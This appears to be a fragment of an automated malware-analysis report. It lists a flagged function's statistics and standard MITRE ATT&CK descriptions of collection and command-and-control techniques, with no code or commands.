stringmemoryCOMMON

Function 00895100 Relevance: 47.8, APIs: 19, Strings: 8, Instructions: 572
stringnetworkmemoryCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre